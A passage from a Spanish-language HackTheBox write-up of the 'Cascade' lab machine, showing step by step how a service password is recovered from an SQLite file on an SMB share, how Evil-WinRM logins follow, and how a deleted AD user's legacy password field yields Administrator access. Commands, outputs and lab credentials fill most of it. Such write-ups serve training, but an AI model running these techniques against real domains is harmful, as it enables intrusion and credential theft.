23:25:27 2020 x86 D 0 Sun Jan 26 23:25:27 2020 \DB . D 0 Tue Jan 28 22:40:59 2020 .. D 0 Tue Jan 28 22:40:59 2020 Audit.db A 24576 Tue Jan 28 22:39:24 2020 \x64 . D 0 Sun Jan 26 23:25:27 2020 .. D 0 Sun Jan 26 23:25:27 2020 SQLite.Interop.dll A 1639936 Sun Oct 27 07:39:20 2019 \x86 . D 0 Sun Jan 26 23:25:27 2020 .. D 0 Sun Jan 26 23:25:27 2020 SQLite.Interop.dll A 1246720 Sun Oct 27 07:34:20 2019 13106687 blocks of size 4096. 7783000 blocks available smb: \> cd DB smb: \DB\> get Audit.db getting file \DB\Audit.db of size 24576 as Audit.db (79,7 KiloBytes/sec) (average 79,7 KiloBytes/sec) smb: \DB\> |
Revisando en profundidad el contenido del mismo encontramos un fichero llamado Audit.db que descargamos y abrimos. Se trata de una base de datos pero haciendo un cat no podemos obtener mucha información del mismo, vamos a ver antes de nada que tipo de fichero es:
1 2 |
$ file Audit.db Audit.db: SQLite 3.x database, last written using SQLite version 3027002 |
Se trata de un fichero de SQLite3, así que lo importamos en local para poder inspeccionar la base de datos y buscar información relevante en la misma:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
$ sqlite3 SQLite version 3.31.1 2020-01-27 19:55:54 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> .open Audit.db sqlite> .tables DeletedUserAudit Ldap Misc sqlite> SELECT * FROM DeletedUserAudit; 6|test|Test DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local 7|deleted|deleted guy DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local 9|TempAdmin|TempAdmin DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local sqlite> SELECT * FROM Ldap; 1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local sqlite> SELECT * FROM Misc; sqlite> |
Inspeccionamos las tablas existentes en la base de datos y obtenemos la contraseña en base64 del usuario ArkSvc:
1 |
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local |
Decodificamos el base64 pero parece que algo no ha funcionado bien o, tal vez, no sea el cifrado que creemos:
1 2 |
$ echo "BQO5l5Kj9MdErXx6Q6AGOw=="|base64 -d ������D�|zC�;root@ |
En este caso di unas cuantas vueltas y al final me dió por buscar en google el hash tal cual y encontré una web donde se encontraba un código en C# y con ello la contraseña descifrada:
Y ya tenemos las credenciales de otro usuario más, escalando un poquito más en nuestro objetivo de llegar a admin:
1 |
arksvc:w3lc0meFr31nd |
Accedemos entonces con el último usuario encontrado a la máquina:
1 2 3 4 5 6 7 8 9 |
$ ruby evil-winrm.rb -i 10.10.10.182 -u "arksvc" -p 'w3lc0meFr31nd' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\arksvc\Documents> whoami cascade\arksvc *Evil-WinRM* PS C:\Users\arksvc\Documents> |
Y al igual que en la anterior ocasión vamos a revisar los permisos y grupos de este usuario:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
*Evil-WinRM* PS C:\> whoami /all USER INFORMATION ---------------- User Name SID ============== ============================================== cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\> |
En este caso, el usuario, pertenece al grupo AD Recycle Bin, al cual no pertenecía el anterior y recordamos lo que vimos al principio del usuario TempAdmin que había sido eliminado y tenía la misma password que root así que tal vez tengamos que buscar en la papelera de reciclaje del AD para poder recuperar las credenciales del mismo.
Buscamos información al respecto en google y encontramos varios posts interesantes en google acerca de como acceder a los objetos de la papelera de reciclaje en el AD.
Lo primero de todo será verificar que la misma se encuentra activa:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
*Evil-WinRM* PS C:\> Get-ADOptionalFeature -Filter * DistinguishedName : CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configurati on,DC=cascade,DC=local EnabledScopes : {CN=Partitions,CN=Configuration,DC=cascade,DC=local, CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local} FeatureGUID : 766ddcd8-acd0-445e-f3b9-a7f9b6744f2a FeatureScope : {ForestOrConfigurationSet} IsDisableable : False Name : Recycle Bin Feature ObjectClass : msDS-OptionalFeature ObjectGUID : 8a5762df-63bc-4407-8249-d1e38e0d322b RequiredDomainMode : RequiredForestMode : Windows2008R2Forest |
Y siguiendo la documentación de microsoft de Get-ADObject buscamos los elementos eliminados que todavía se encuentran en la misma:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
*Evil-WinRM* PS C:\> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects Deleted : True DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local Name : CASC-WS1 DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe ObjectClass : computer ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe Deleted : True DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local Name : Scheduled Tasks DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2 ObjectClass : group ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2 Deleted : True DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local Name : {A403B701-A528-4685-A816-FDEE32BDDCBA} DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e ObjectClass : groupPolicyContainer ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e Deleted : True DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local Name : Machine DEL:93c23674-e411-400b-bb9f-c0340bda5a34 ObjectClass : container ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34 Deleted : True DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local Name : User DEL:746385f2-e3a0-4252-b83a-5a206da0ed88 ObjectClass : container ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88 Deleted : True DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059 |
Encontramos un objeto que seguramente sea el que necesitamos y cuyo nombre es “TempAdmin”, el nombre de usuario que vimos en un fichero del smb durante la enumeración, así que procedemos a restaurar el mismo, pero resulta que no tenemos permisos para ello:
1 2 3 4 5 6 7 8 |
*Evil-WinRM* PS C:\> Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059' Insufficient access rights to perform the operation At line:1 char:1 + Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject *Evil-WinRM* PS C:\> |
Bueno, parece que esa opción era demasiado obvia, seguimos entonces buscando y procedemos a revisar las propiedades del objeto y…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
*Evil-WinRM* PS C:\> Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties * accountExpires : 9223372036854775807 badPasswordTime : 0 badPwdCount : 0 CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 codePage : 0 countryCode : 0 Created : 1/27/2020 3:23:08 AM createTimeStamp : 1/27/2020 3:23:08 AM Deleted : True Description : DisplayName : TempAdmin DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM} givenName : TempAdmin instanceType : 4 isDeleted : True LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local lastLogoff : 0 lastLogon : 0 logonCount : 0 Modified : 1/27/2020 3:24:34 AM modifyTimeStamp : 1/27/2020 3:24:34 AM msDS-LastKnownRDN : TempAdmin Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059 objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 132245689883479503 sAMAccountName : TempAdmin sDRightsEffective : 0 userAccountControl : 66048 userPrincipalName : TempAdmin@cascade.local uSNChanged : 237705 uSNCreated : 237695 whenChanged : 1/27/2020 3:24:34 AM whenCreated : 1/27/2020 3:23:08 AM |
Ahora sí, observamos un campo en el cual se encuentra una credencial que aparentemente está en base64:
1 |
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz |
Obteniendo la flag de root
Desciframos la password obtenida anteriormente y procedemos a intentar acceder con el usuario Administrator a la máquina:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ ruby evil-winrm.rb -i 10.10.10.182 -u Administrator Enter Password: Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami cascade\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> dir Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/15/2020 2:56 PM 34 root.txt -a---- 3/25/2020 11:17 AM 1031 WinDirStat.lnk *Evil-WinRM* PS C:\Users\Administrator\desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respecto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792